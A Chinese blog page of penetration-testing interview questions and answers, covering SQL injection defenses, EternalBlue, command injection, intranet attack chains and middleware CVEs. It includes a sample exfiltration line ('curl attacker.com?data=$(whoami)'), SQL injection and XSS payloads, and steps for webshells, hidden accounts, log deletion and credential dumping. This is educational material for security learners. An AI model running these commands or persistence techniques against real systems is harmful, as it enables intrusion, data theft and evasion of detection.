当前位置: 首页 > news >正文

2025年渗透测试面试题总结-54(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

1、SQL注入的防护方法有哪些?
2、永恒之蓝的漏洞原理是什么?怎么做到的?
3、命令注入有哪些?
4、给你一个目标网站,你该如何进行测试?
5、给你一个后台登陆地点的网站,你能从中发现那些问题?
6、给你一千台服务器和交换机,你会如何进行扫描?
7、内网渗透了解多少?
8、中间件有哪些?
9、中间件有哪些已知的漏洞?

1. SQL注入防护方法

核心原则:数据与代码分离

  • 参数化查询(Prepared Statements)
    使用占位符(如?@param)替代拼接SQL,数据库区分指令与数据(如Java的PreparedStatement、Python的cursor.execute() )。
  • 输入过滤与白名单校验
    对用户输入进行类型/长度约束(如仅允许邮箱格式),禁用高危字符(';--)。
  • 最小权限原则
    数据库账户仅赋予必要权限(禁用DROPFILE等)。
  • ORM框架使用
    Hibernate、Entity Framework等自动转义输入。
  • Web应用防火墙(WAF)
    部署ModSecurity等规则引擎拦截注入特征(如UNION SELECT)。
  • 错误信息屏蔽
    避免数据库报错信息直接返回前端。

2. 永恒之蓝(EternalBlue)漏洞原理

CVE编号:CVE-2017-0144
漏洞根源:SMBv1协议处理SMBv1 Trans2请求的缓冲区溢出漏洞。
攻击流程

  1. 畸形数据包触发溢出
    攻击者发送特制的SMB_COM_TRANSACTION2请求,覆盖内核内存。
  2. 内核权限执行Shellcode
    利用溢出覆盖函数指针,执行攻击者代码(如NSA开发的DoublePulsar后门)。
  3. 横向传播
    通过SMB协议在内网自动扩散(如WannaCry勒索病毒)。
    修复方案
    禁用SMBv1,安装MS17-010补丁,关闭445端口。

3. 命令注入类型与案例

分类方式

  • 直接命令注入
    用户输入直接拼接至系统命令(如os.system("ping " + user_input)),可通过;&|执行多条命令。
  • 间接注入(如环境变量污染)
    篡改PATHLD_PRELOAD劫持动态链接库。
  • 盲注(无回显)
    通过时间延迟(sleep 5)或DNS外带数据(curl attacker.com?data=$(whoami) )判断结果。
    高危函数
    PHP的system()/exec()、Python的os.popen() 、Node.js 的child_process.exec()

4. 目标网站渗透测试流程

分阶段方法论

阶段关键操作
信息收集WHOIS查询、子域名爆破(Amass)、端口扫描(Nmap)、框架指纹识别(Wappalyzer)
漏洞扫描自动化工具(Burp Suite、Nessus) + 手动验证(如修改参数、边界值测试)
漏洞利用SQL注入工具(sqlmap)、XSS载荷测试、文件上传绕过(Content-Type欺骗)
权限提升利用系统/服务漏洞提权(如Dirty Pipe)、数据库弱口令爆破
权限维持植入Webshell(蚁剑/冰蝎)、创建隐藏账户、SSH密钥后门
内网横向移动ARP欺骗、Pass-the-Hash攻击、域渗透(BloodHound分析)
痕迹清理删除日志(/var/log/)、隐藏进程(rootkit)

5. 后台登录点安全审计要点

  • 认证机制缺陷
    • 弱口令(admin/admin123)
    • 无验证码或验证码可绕过(OCR识别、重复使用)
    • 未限制登录尝试频率(爆破漏洞)
  • 传输与存储风险
    • HTTP明文传输密码(应强制HTTPS)
    • Cookie未设置HttpOnly(XSS窃取会话)
  • 逻辑漏洞
    • 响应差异暴露用户存在性(枚举用户名)
    • 密码重置功能缺陷(Token未绑定用户、可预测Token)
  • 注入漏洞
    • SQL注入(' OR 1=1 --
    • XSS注入(登录表单插入<script>alert(1)</script>

6. 千台服务器/交换机扫描策略

分布式架构设计

mermaigraph LR A[控制节点] --> B[任务队列 Kafka/RabbitMQ] B --> C[扫描节点1-N] C --> D[结果存储 ES]

关键技术点

  • IP分段与负载均衡
    使用nmap -sS -iL targets.txt -oA scan --max-rate 1000分批次扫描,避免流量洪峰。
  • 指纹识别优化
    并行化服务识别(-sV)与OS探测(-O)。
  • 交换机特殊处理
    SNMP扫描(snmpwalk)、ARP扫描(netdiscover),避开ICMP限制。
  • 结果聚合
    通过Elasticsearch + Kibana可视化漏洞分布。

7. 内网渗透核心技术

攻击链关键步骤

  1. 信息收集
    ARP扫描、NetBIOS枚举、域控制器定位(nltest /dclist)。
  2. 权限提升
    本地提权(CVE-2021-4034)、凭证窃取(Mimikatz抓取LSASS内存)。
  3. 横向移动
    • 协议利用:SMB爆破(CrackMapExec)、WinRM远程执行
    • 中间人攻击:LLMNR/NBT-NS投毒(Responder)
    • 域渗透:黄金票据伪造、DCSync攻击获取域控权限
  4. 数据窃取与持久化
    隐蔽隧道(DNS/ICMP)、GPO组策略后门。

8. 常见中间件列表

类型代表产品
Web服务器Apache、Nginx、IIS
应用服务器Tomcat、WebLogic、JBoss/WildFly
反向代理Traefik、HAProxy
消息队列RabbitMQ、Kafka、ActiveMQ
API网关Kong、Tyk

9. 中间件经典漏洞案例

中间件漏洞影响
ApacheCVE-2021-41773(路径遍历)读取服务器敏感文件
NginxCVE-2013-2028(栈溢出)远程代码执行(RCE)
TomcatCVE-2020-1938(Ghostcat)AJP协议文件读取/RCE
WebLogicCVE-2020-14882(未授权命令执行)控制服务器
JBossJMXInvokerServlet 反序列化远程代码执行
http://www.xdnf.cn/news/1475677.html

相关文章:

  • rom定制系列------小米8“无人直播”虚拟摄像头 刷机固件 实现解析过程
  • `vector_ip_ops`(内积操作)和 `vector_cosine_ops`(余弦相似度操作)的不同
  • 详解 ELO 评分系统
  • [光学原理与应用-414]:设计 - 深紫外皮秒脉冲激光器 - 元件 - 柱面镜:光学系统中的一维(焦线)调控专家(传统透镜是0维的点)
  • 《用 asyncio 构建异步任务队列:Python 并发编程的实战与思考》
  • java分布式场景怎么实现一个高效的 读-写锁
  • 友猫社区APP源码与小程序端部署详解
  • Redis数据库基础
  • MySQL中有哪些锁
  • MathJax - LaTeX:WordPress 公式精准呈现方案
  • Android Studio 构建变体中的资源选择顺序详解
  • UDP-Server(2)词典功能
  • git在Linux中的使用
  • mac-intel操作系统go-stock项目(股票分析工具)安装与配置指南
  • v0.29.3 敏感词性能优化之繁简体转换 opencc4j 优化
  • 大语言模型提示词工程详尽实战指南
  • 记一次uniapp+nutui-uniapp搭建项目
  • 计算机网络:无线局域网加密与认证方式
  • LeetCode算法日记 - Day 33: 最长公共前缀、最长回文子串
  • Linux | i.MX6ULL Tftp 烧写和 Nfs 启动(第十九章)
  • Paimon——官网阅读:文件系统
  • 1.5、机器学习-回归算法
  • Oracle体系结构-Redo Log Buffer详解
  • Day22_【机器学习—集成学习(3)—Boosting—Adaboost算法】
  • FreeMarker快速入门指南
  • Lua 面向对象编程
  • 【MFC】对话框节点属性:Language(语言)
  • macOS下arm编译缺少stdint.h等问题
  • Python入门:从Hello World到项目创建
  • MySQL与ES索引区别